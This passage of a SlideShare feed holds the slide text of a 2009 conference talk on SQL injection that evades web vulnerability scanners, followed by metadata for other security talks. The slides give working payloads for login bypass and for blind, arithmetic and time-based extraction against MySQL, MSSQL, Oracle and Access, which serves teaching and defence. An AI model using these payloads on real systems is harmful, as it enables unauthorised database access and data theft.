http://www.web.com/login.php?v_name=Robert&amp;amp;v_pass=&#8217;=&#8216;&#8217; or &#8216;1&#8217;=&#8216;1&#8217; or &#8216;Kubica 
Select uid 
From users where &#8216;Robert&#8217;=name and &#8217;&#8217;=&#8216;&#8217; or &#8216;1&#8217;=&#8216;1&#8217; or &#8216;Kubica&#8217;=password 
&#61664; Success 
15.Blind Attacks 
Attacker injects code but can&#180;t access directly to the data. 
However this injection changes the behavior of the web application. 
Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. 
Blind SQL Injection 
Biind Xpath Injection 
Blind LDAP Injection 
16.Blind SQL Injection Attacks 
Attacker injects: 
&#8220; True where clauses&#8221; 
&#8220; False where clauses&#8220; 
Ex: 
Program.php?id=1 and 1=1 
Program.php?id=1 and 1=2 
Program doesn&#8217;t return any visible data from database or data in error messages. 
The attacker can&#180;t see any data extracted from the database. 
17.Blind SQL Injection Attacks 
Attacker analyzes the response pages looking for differences between &#8220;True-Answer Page&#8221; and &#8220;False-Answer Page&#8221;: 
Different hashes 
Different html structure 
Different patterns (keywords) 
Different linear ASCII sums 
&#8220; Different behavior&#8221; 
By example: Response Time 
18.Blind SQL Injection Attacks 
If any difference exists, then: 
Attacker can extract all information from database 
How? Using &#8220;booleanization&#8221; 
MySQL: 
Program.php?id=1 and 100&amp;gt;(ASCII(Substring(user(),1,1))) 
&#8220; True-Answer Page&#8221; or &#8220;False-Answer Page&#8221;? 
MSSQL: 
Program.php?id=1 and 100&amp;gt;(Select top 1 ASCII(Substring(name,1,1))) from sysusers) 
Oracle: 
Program.php?id=1 and 100&amp;gt;(Select ASCII(Substr(username,1,1))) from all_users where rownum&amp;amp;lt;=1) 
19.Blind Inverted Query 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 2 and 1=1 
Select product 
From products 
Where 2 and 1=1=id; 
-&amp;gt; FAIL 
20.The MySQL Case 
1 is True 
1=1=1 -&amp;gt;True 
1=1=(1+1-1)=abs(1)=1 -&amp;gt; True 
2=2=2 -&amp;gt;False 
-&amp;gt; 2=2 becomes True -&amp;gt; True=2 
-&amp;gt; True is equals to 1 then 1=2 is False 
Select product 
From products 
Where v_value=id; 
http://www.web.com/products.php?v_value= 1 and 1=1 
Select product 
From products 
Where 1 and 1=1=id; 
-&amp;gt; SUCCES (if there is a Id=1) 
21.Web Scanner behaviors 
Acunetix 
Paros 
AppScan 
W3af 
Wapiti 
Proxy Strike 
22.Acunetix &amp;amp; Homer 
23.Acunetix &amp;amp; Flanders 
24.AppScan &amp;amp; Homer 
25.AppScan &amp;amp; Flanders 
26.Paros &amp;amp; Homer 
27.Paros &amp;amp; Flanders 
28.W3af &amp;amp; Homer 
29.W3af &amp;amp; Flanders 
30.Wapiti &amp;amp; Homer 
31.Wapiti &amp;amp; Flanders 
32.Demo 
W3af 
Wapiti 
Proxy Strike 
33.Results   Normal Inverted   MySQL MS SQL Server MySQL MS SQL Server   Numeric String Numeric String Numeric String Numeric String Paros                 AppScan                 Acunetix                 w3af                 wapiti                 Proxy Strike                 
34.In the end&#8230; 
OUCH!!! 
Thank God for keep me safe 
35.Solutions? 
Concat string injection 
Arithmetic Blind SQL Injection 
Time-Based Blind SQL injection 
Delay Functions 
Heavy queries 
36.3.- Arithmetic 
37.What about this queries? 
How to detect/exploit this Blind SQLinjection vulnerability? 
The query forces the parameter to be numeric 
SELECT field FROM table WHERE id=abs( param ) 
Ex: 
Get Param( ID ) 
Select &#8230;.. Where att1=abs( ID ) 
Select &#8230;.. Where att2=k1- ID 
Print response 
Not AND or OR operators can be used. 
Boolean logic needs to be created with math operations 
38.Arithmetic Blind SQL Injection 
Divide by zero (David Litchfield) 
Id=A+(1/(ASCII(B)-C)) 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
TRUE: When ASCII(B)=C, the DB will generate a divide by zero exception. 
39.Arithmetic Blind SQL Injection 
Sums and subtractions 
Id=A+ASCII(B)-C 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A 
40.Arithmetic Blind SQL Injection 
Value type overflow 
Id=A+((C/ASCII(B))*(K)) 
A-&amp;gt; Param value originally used in the query. 
B -&amp;gt; Value we are searching for, e.g.: Substring(passwd,1,1) 
C-&amp;gt; Counter [0..255] 
K-&amp;gt; Value that overflows the type defined for A 
(e.g. if A is integer, then K=2^ 32 ) 
When C/ASCII(B)==1, K*1 overflows the data type 
41.Demo: 
Divide by zero 
Sums and subtractions 
Integer overflow 
42.Conclusions 
Arithmetic Blind SQL Injection allows to construct binary logic without &#8220;AND&#8221; and &#8220;OR&#8221;. 
detects bugs in this kind of queries&#8230; 
And also in Inverted queries in which a numeric value is used 
Almost none of the vulnerability scanners are using this method 
43.4.-Time-based Blind SQL Injection using heavy queries 
44.Time-Based Blind SQL Injection 
In scenarios with no differences between &#8220;True-Answer Page&#8221; and &#8220;False-Answer Page&#8221;, time delays can be used. 
Injection forces a delay in the response page when the condition injected is True. 
- Delay functions: 
SQL Server: waitfor 
Oracle: dbms_lock.sleep 
MySQL: sleep or Benchmark Function 
Postgres: pg_sleep 
Ex: 
; if (exists(select * from users)) waitfor delay &amp;amp;apos;0:0:5&#8217; 
45.Time-Based Blind SQL Injection 
What about DBs without delay functions, i.e.: 
Oracle connections MS Access DB2 
without PL/SQL injection 
Can we still perform an exploitation of Time-Based Blind SQL Injection Attacks? 
46. 
47.&#8220; Where-Clause&#8221; execution order 
Select &#8220;whatever &#8220; 
From whatever 
Where condition1 and condition2 
- Condition1 lasts 10 seconds 
- Condition2 lasts 100 seconds 
Which condition should be executed first? 
48.The heavy condition first Condition2 (100 sec) Condition1 (10 sec) Condition2 &amp;amp; condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec 
49.The light condition first Condition1 (10 sec) Condition2 (100 sec) Condition1 &amp;amp; condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec 
50.Time-Based Blind SQL Injection using Heavy Queries 
Attacker can perform an exploitation delaying the &#8220;True-answer page&#8221; using a heavy query. 
It depends on how the database engine evaluates the where clauses in the query. 
There are two types of database engines: 
Databases without optimization process 
Databases with optimization process 
51.Time-Based Blind SQL Injection using Heavy Queries 
Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. 
The Cross-join injection must be heavier than the other condition. 
Attacker only have to know or to guess the name of a table with select permission in the database. 
Example in MSSQL: 
Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)&amp;gt;1 and 300&amp;gt;(select top 1 ascii(substring(name,1,1)) from sysusers) 
52.&#8220; Default&#8221; tables to construct a heavy query 
Microsoft SQL Server 
sysusers 
Oracle 
all_users 
MySQL (versi&#243;n 5) 
information_schema.columns 
Microsoft Access 
MSysAccessObjects (97 &amp;amp; 2000 versions) 
MSysAccessStorage (2003 &amp;amp; 2007) 
53.&#8220; Default&#8221; tables to construct a heavy query 
&#8230; or whatever you can guess 
Clients 
Customers 
News 
Logins 
Users 
Providers 
&#8230; .Use your imagination&#8230; 
54.Ex 1: MS SQL Server 
Query takes 14 seconds -&amp;gt; True-Answer 
55.Ex 1: MS SQL Server 
Query takes 1 second -&amp;gt; False-Answer 
56.Ex 2: Oracle 
Query Takes 22 seconds &#8211;&amp;gt; True-Answer 
57.Ex 2: Oracle 
Query Takes 1 second &#8211;&amp;gt; False-Answer 
58.Ex 3: Access 2007 
Query Takes 39 seconds &#8211;&amp;gt; True-Answer 
59.Ex 3: Access 2007 
Query Takes 1 second &#8211;&amp;gt; False-Answer 
60.Marathon Tool 
Automates Time-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. 
Schema Extraction from known databases 
Extract data using heavy queries not matter in which database engine (without schema) 
Developed in .NET 
Source code available 
http://www.codeplex.com/marathontool 
61.Demo: Marathon Tool 
62.5.- Conclusions 
63.The real world has plenty kinds of developers&#8230; 
64.References 
Inverted SQL queries (Spanish) 
http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html 
Arithemtic Blind SQL Injection (spanish) 
http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html 
Time-Based Blind SQL Injection Using heavy queries &amp;amp; Marathon Tool 
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf 
Marathon Tool 
http://www.codeplex.com/marathontool 
Connection String Attacks (spanish) 
http://www.slideshare.net/chemai64/connection-string-parameter-pollution 
65.Don&#180;t complain about your job!! 
66.Thanks! Chema Alonso ( [email_address] ) Jos&#233; Parada ( [email_address] ) 
+ chemai64, 20 hours ago 

Embed  custom .Without related presentations 
 
For WordPress.com 
 

173 views, 0 favs, 3 embeds more stats 

Session deliverd by Jos&#233; Parada &amp;amp; Chema Alonso in more

Session deliverd by Jos&#233; Parada &amp;amp; Chema Alonso in CONFidence VI Edition - Warszawa 2009 about How How &amp;quot;&#183;$% developers defeat the web vulnerability scanners. SQL injection Tips &amp;amp; Tricks. That&#180;s all folks!</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/confidence2009public-091120104250-phpapp01-thumbnail-2?1258735439" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2546881"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/how-developers-defeat-the-web-vulnerability-scanners-2546881" title="How &quot;·$% developers defeat the web vulnerability scanners">How &quot;·$% developers defeat the web vulnerability scanners</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=confidence2009public-091120104250-phpapp01&stripped_title=how-developers-defeat-the-web-vulnerability-scanners-2546881" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=confidence2009public-091120104250-phpapp01&stripped_title=how-developers-defeat-the-web-vulnerability-scanners-2546881" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>354</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/confidence2009public-091120104250-phpapp01-thumbnail-2?1258735439</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Forefront Threat Management Gateway</title>
      <link>http://www.slideshare.net/chemai64/forefront-threat-management-gateway</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/00ppts1eventotmgjuanluis-091105163006-phpapp02-thumbnail-2?1257460279" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís García Rambla sobre Forefront Threat Management Gateway en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/00ppts1eventotmgjuanluis-091105163006-phpapp02-thumbnail-2?1257460279" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Juan Luís García Rambla sobre Forefront Threat Management Gateway en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </content:encoded>
      <pubDate>Thu, 05 Nov 2009 22:27:10 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/forefront-threat-management-gateway</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/forefront-threat-management-gateway"/>
        <media:title>Forefront Threat Management Gateway</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Juan Lu&#237;s Garc&#237;a Rambla sobre Forefront Threat Management Gateway en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/00ppts1eventotmgjuanluis-091105163006-phpapp02-thumbnail-2?1257460279&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Juan Lu&#237;s Garc&#237;a Rambla sobre Forefront Threat Management Gateway en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/00ppts1eventotmgjuanluis-091105163006-phpapp02-thumbnail-2?1257460279" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2433258"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/forefront-threat-management-gateway" title="Forefront Threat Management Gateway">Forefront Threat Management Gateway</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=00ppts1eventotmgjuanluis-091105163006-phpapp02&stripped_title=forefront-threat-management-gateway" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=00ppts1eventotmgjuanluis-091105163006-phpapp02&stripped_title=forefront-threat-management-gateway" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>387</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/00ppts1eventotmgjuanluis-091105163006-phpapp02-thumbnail-2?1257460279</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>MetaShield Protector</title>
      <link>http://www.slideshare.net/chemai64/metashield-protector</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/presentacionalex-091105161813-phpapp02-thumbnail-2?1257459587" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Alejandro Martín Bailón sobre Metadata Security, La Foca y MetaShield Protector en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/presentacionalex-091105161813-phpapp02-thumbnail-2?1257459587" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Alejandro Martín Bailón sobre Metadata Security, La Foca y MetaShield Protector en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </content:encoded>
      <pubDate>Thu, 05 Nov 2009 22:18:08 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/metashield-protector</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/metashield-protector"/>
        <media:title>MetaShield Protector</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Alejandro Mart&#237;n Bail&#243;n sobre Metadata Security, La Foca y MetaShield Protector en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/presentacionalex-091105161813-phpapp02-thumbnail-2?1257459587&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Alejandro Mart&#237;n Bail&#243;n sobre Metadata Security, La Foca y MetaShield Protector en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/presentacionalex-091105161813-phpapp02-thumbnail-2?1257459587" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2433219"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/metashield-protector" title="MetaShield Protector">MetaShield Protector</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionalex-091105161813-phpapp02&stripped_title=metashield-protector" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionalex-091105161813-phpapp02&stripped_title=metashield-protector" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>194</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/presentacionalex-091105161813-phpapp02-thumbnail-2?1257459587</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Exchange Server 2010 &amp;amp; Message Stats</title>
      <link>http://www.slideshare.net/chemai64/exchange-server-2010-message-stats</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/exchange2010messagestats-091105161748-phpapp02-thumbnail-2?1257459544" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz Guijarro sobre Exhange Server 2010 y Quest Message Stats en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/exchange2010messagestats-091105161748-phpapp02-thumbnail-2?1257459544" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Sesión impartida por Joshua Sáenz Guijarro sobre Exhange Server 2010 y Quest Message Stats en el evento del décimo aniversario de Informática64. El pasado 1 de Octubre de 2009.]]>
      </content:encoded>
      <pubDate>Thu, 05 Nov 2009 22:17:42 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/exchange-server-2010-message-stats</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/exchange-server-2010-message-stats"/>
        <media:title>Exchange Server 2010 &amp;amp; Message Stats</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Sesi&#243;n impartida por Joshua S&#225;enz Guijarro sobre Exhange Server 2010 y Quest Message Stats en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/exchange2010messagestats-091105161748-phpapp02-thumbnail-2?1257459544&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Sesi&#243;n impartida por Joshua S&#225;enz Guijarro sobre Exhange Server 2010 y Quest Message Stats en el evento del d&#233;cimo aniversario de Inform&#225;tica64. El pasado 1 de Octubre de 2009.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/exchange2010messagestats-091105161748-phpapp02-thumbnail-2?1257459544" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2433217"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/exchange-server-2010-message-stats" title="Exchange Server 2010 &amp; Message Stats">Exchange Server 2010 &amp; Message Stats</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=exchange2010messagestats-091105161748-phpapp02&stripped_title=exchange-server-2010-message-stats" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=exchange2010messagestats-091105161748-phpapp02&stripped_title=exchange-server-2010-message-stats" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>225</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/exchange2010messagestats-091105161748-phpapp02-thumbnail-2?1257459544</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>LDAP Injection &amp;amp; Blind LDAP Injection</title>
      <link>http://www.slideshare.net/chemai64/ldap-injection-blind-ldap-injection</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/diapositivasldapinjectionblindldapinjection-091009110224-phpapp01-thumbnail-2?1255104287" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> This talk was delivered in BlackHat Europe 2009 by Chema Alonso &amp; José Parada.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/diapositivasldapinjectionblindldapinjection-091009110224-phpapp01-thumbnail-2?1255104287" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> This talk was delivered in BlackHat Europe 2009 by Chema Alonso &amp; José Parada.]]>
      </content:encoded>
      <pubDate>Fri, 09 Oct 2009 16:02:19 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/ldap-injection-blind-ldap-injection</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/ldap-injection-blind-ldap-injection"/>
        <media:title>LDAP Injection &amp;amp; Blind LDAP Injection</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">This talk was delivered in BlackHat Europe 2009 by Chema Alonso &amp;amp; Jos&#233; Parada.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/diapositivasldapinjectionblindldapinjection-091009110224-phpapp01-thumbnail-2?1255104287&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; This talk was delivered in BlackHat Europe 2009 by Chema Alonso &amp;amp; Jos&#233; Parada.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/diapositivasldapinjectionblindldapinjection-091009110224-phpapp01-thumbnail-2?1255104287" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2176219"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/ldap-injection-blind-ldap-injection" title="LDAP Injection &amp; Blind LDAP Injection">LDAP Injection &amp; Blind LDAP Injection</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=diapositivasldapinjectionblindldapinjection-091009110224-phpapp01&stripped_title=ldap-injection-blind-ldap-injection" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=diapositivasldapinjectionblindldapinjection-091009110224-phpapp01&stripped_title=ldap-injection-blind-ldap-injection" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>307</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
        <slideshare:thumbnail>http://cdn.slidesharecdn.com/diapositivasldapinjectionblindldapinjection-091009110224-phpapp01-thumbnail-2?1255104287</slideshare:thumbnail>
        <slideshare:type>presentation</slideshare:type>
      </slideshare:meta>
      <slideshare:config>
        <slideshare:isprofileslide></slideshare:isprofileslide>
        <slideshare:profileswfpath></slideshare:profileswfpath>
        <slideshare:branding></slideshare:branding>
      </slideshare:config>
      <activity:verb>http://activitystrea.ms/schema/1.0/post</activity:verb>
      <activity:object-type>http://activitystrea.ms/schema/1.0/posted</activity:object-type>
    </item>
    <item>
      <title>Connection String Parameter Pollution</title>
      <link>http://www.slideshare.net/chemai64/connection-string-parameter-pollution</link>
      <description>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/cspp-090917181402-phpapp02-thumbnail-2?1253229285" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Charla impartida por Chema Alonso en la Ekoparty 2009 sobre Connection String Parameter Pollution.]]>
      </description>
      <content:encoded>
        <![CDATA[<img src="http://cdn.slidesharecdn.com/cspp-090917181402-phpapp02-thumbnail-2?1253229285" alt ="" style="border:1px solid #C3E6D8;float:right;" /><br> Charla impartida por Chema Alonso en la Ekoparty 2009 sobre Connection String Parameter Pollution.]]>
      </content:encoded>
      <pubDate>Thu, 17 Sep 2009 23:14:01 GMT</pubDate>
      <guid>http://www.slideshare.net/chemai64/connection-string-parameter-pollution</guid>
      <author>chemai64@slideshare.net(chemai64)</author>
      <media:content>
        <media:player url="http://www.slideshare.net/chemai64/connection-string-parameter-pollution"/>
        <media:title>Connection String Parameter Pollution</media:title>
        <media:credit>chemai64</media:credit>
        <media:description type="plain">Charla impartida por Chema Alonso en la Ekoparty 2009 sobre Connection String Parameter Pollution.</media:description>
        <media:text type="html">&lt;img src=&quot;http://cdn.slidesharecdn.com/cspp-090917181402-phpapp02-thumbnail-2?1253229285&quot; alt =&quot;&quot; style=&quot;border:1px solid #C3E6D8;float:right;&quot; /&gt;&lt;br&gt; Charla impartida por Chema Alonso en la Ekoparty 2009 sobre Connection String Parameter Pollution.</media:text>
        <media:keywords></media:keywords>
        <media:thumbnail height="90" url="http://cdn.slidesharecdn.com/cspp-090917181402-phpapp02-thumbnail-2?1253229285" width="120"/>
      </media:content>
      <slideshare:embed>
        <![CDATA[<div style="width:425px;text-align:left" id="__ss_2014692"><a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/connection-string-parameter-pollution" title="Connection String Parameter Pollution">Connection String Parameter Pollution</a><object style="margin:0px" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cspp-090917181402-phpapp02&stripped_title=connection-string-parameter-pollution" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cspp-090917181402-phpapp02&stripped_title=connection-string-parameter-pollution" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;">View more <a style="text-decoration:underline;" href="http://www.slideshare.net/">presentations</a> from <a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64">chemai64</a>.</div></div>]]>
      </slideshare:embed>
      <slideshare:meta>
        <slideshare:views>2226</slideshare:views>
        <slideshare:comments>0</slideshare:comments>
